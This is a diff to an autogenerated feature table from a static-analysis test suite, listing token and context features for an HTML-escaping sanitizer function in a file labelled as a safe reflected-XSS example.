str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:14:18:14:25 | '"' | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:14:18:14:25 | '"' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:16:12:16:13 | 38 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:16:12:16:13 | 38 | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:16:12:16:13 | 38 | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:16:12:16:13 | 38 | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:16:12:16:13 | 38 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:17:9:17:14 | escape | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:17:9:17:14 | escape | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:17:9:17:14 | escape | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:17:9:17:14 | escape | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:17:9:17:14 | escape | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:17:9:17:24 | escape | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:17:9:17:24 | escape | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:17:9:17:24 | escape | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:17:9:17:24 | escape | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:17:9:17:24 | escape | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:17:9:17:24 | escape = '&' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:17:9:17:24 | escape = '&' | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:17:9:17:24 | escape = '&' | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:17:9:17:24 | escape = '&' | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:17:9:17:24 | escape = '&' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:17:18:17:24 | '&' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:17:18:17:24 | '&' | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:17:18:17:24 | '&' | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:17:18:17:24 | '&' | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:17:18:17:24 | '&' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:19:12:19:13 | 39 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:19:12:19:13 | 39 | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:19:12:19:13 | 39 | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:19:12:19:13 | 39 | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:19:12:19:13 | 39 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:20:9:20:14 | escape | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:20:9:20:14 | escape | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:20:9:20:14 | escape | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:20:9:20:14 | escape | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:20:9:20:14 | escape | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:20:9:20:24 | escape | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:20:9:20:24 | escape | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:20:9:20:24 | escape | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:20:9:20:24 | escape | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:20:9:20:24 | escape | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:20:9:20:24 | escape = ''' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:20:9:20:24 | escape = ''' | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:20:9:20:24 | escape = ''' | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:20:9:20:24 | escape = ''' | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:20:9:20:24 | escape = ''' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:20:18:20:24 | ''' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:20:18:20:24 | ''' | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:20:18:20:24 | ''' | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:20:18:20:24 | ''' | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:20:18:20:24 | ''' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:22:12:22:13 | 60 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:22:12:22:13 | 60 | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:22:12:22:13 | 60 | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:22:12:22:13 | 60 | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:22:12:22:13 | 60 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:23:9:23:14 | escape | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:23:9:23:14 | escape | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:23:9:23:14 | escape | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:23:9:23:14 | escape | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:23:9:23:14 | escape | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:23:9:23:23 | escape | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:23:9:23:23 | escape | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:23:9:23:23 | escape | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:23:9:23:23 | escape | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:23:9:23:23 | escape | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:23:9:23:23 | escape = '<' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:23:9:23:23 | escape = '<' | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:23:9:23:23 | escape = '<' | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:23:9:23:23 | escape = '<' | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:23:9:23:23 | escape = '<' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:23:18:23:23 | '<' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:23:18:23:23 | '<' | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:23:18:23:23 | '<' | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:23:18:23:23 | '<' | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:23:18:23:23 | '<' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:25:12:25:13 | 62 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:25:12:25:13 | 62 | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:25:12:25:13 | 62 | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:25:12:25:13 | 62 | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:25:12:25:13 | 62 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:26:9:26:14 | escape | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:26:9:26:14 | escape | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:26:9:26:14 | escape | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:26:9:26:14 | escape | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:26:9:26:14 | escape | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:26:9:26:23 | escape | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:26:9:26:23 | escape | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:26:9:26:23 | escape | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:26:9:26:23 | escape | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:26:9:26:23 | escape | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:26:9:26:23 | escape = '>' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:26:9:26:23 | escape = '>' | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:26:9:26:23 | escape = '>' | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:26:9:26:23 | escape = '>' | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:26:9:26:23 | escape = '>' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:26:18:26:23 | '>' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:26:18:26:23 | '>' | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:26:18:26:23 | '>' | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:26:18:26:23 | '>' | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:26:18:26:23 | '>' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:32:5:32:5 | escape | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:32:5:32:5 | escape | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:32:5:32:5 | escape | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:32:5:32:5 | escape | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:32:5:32:5 | escape | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:32:9:32:17 | lastIndex | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:32:9:32:17 | lastIndex | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:32:9:32:17 | lastIndex | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:32:9:32:17 | lastIndex | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:32:9:32:17 | lastIndex | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:32:9:32:27 | lastIndex !== index | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:32:9:32:27 | lastIndex !== index | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:32:9:32:27 | lastIndex !== index | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:32:9:32:27 | lastIndex !== index | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:32:9:32:27 | lastIndex !== index | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:7:33:10 | html | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:7:33:10 | html | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:7:33:10 | html | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:7:33:10 | html | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:7:33:10 | html | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:7:33:10 | html | stringConcatenatedWith | -endpoint- str.substring() | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:7:33:45 | html | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:7:33:45 | html | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:7:33:45 | html | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | @@ -20794,12 +138380,32 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:7:33:45 | html += ... index) | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:7:33:45 | html += ... index) | enclosingFunctionName | escapeHtml1 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:7:33:45 | html += ... index) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:15:33:17 | str | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:15:33:17 | str | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:15:33:17 | str | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:15:33:17 | str | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:15:33:17 | str | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:15:33:27 | str.substring | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:15:33:27 | str.substring | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:15:33:27 | str.substring | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:15:33:27 | str.substring | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:15:33:27 | str.substring | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:15:33:45 | exceptional return of str.sub ... index) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:15:33:45 | exceptional return of str.sub ... index) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:15:33:45 | exceptional return of str.sub ... index) | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:15:33:45 | exceptional return of str.sub ... index) | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:15:33:45 | exceptional return of str.sub ... index) | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:15:33:45 | str.sub ... index) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:15:33:45 | str.sub ... index) | contextSurroundingFunctionParameters | (string) | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:15:33:45 | str.sub ... index) | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:15:33:45 | str.sub ... index) | enclosingFunctionName | escapeHtml1 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:15:33:45 | str.sub ... index) | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:15:33:45 | str.sub ... index) | stringConcatenatedWith | '' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:19:33:27 | substring | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:19:33:27 | substring | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:19:33:27 | substring | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:19:33:27 | substring | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:19:33:27 | substring | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:29:33:37 | lastIndex | CalleeFlexibleAccessPath | str.substring | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:29:33:37 | lastIndex | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:29:33:37 | lastIndex | calleeImports | | @@ -20818,6 +138424,43 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:40:33:44 | index | enclosingFunctionName | escapeHtml1 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:40:33:44 | index | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:33:40:33:44 | index | receiverName | str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:36:5:36:5 | html | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:36:5:36:5 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:36:5:36:5 | html | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:36:5:36:5 | html | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:36:5:36:5 | html | fileImports | express | 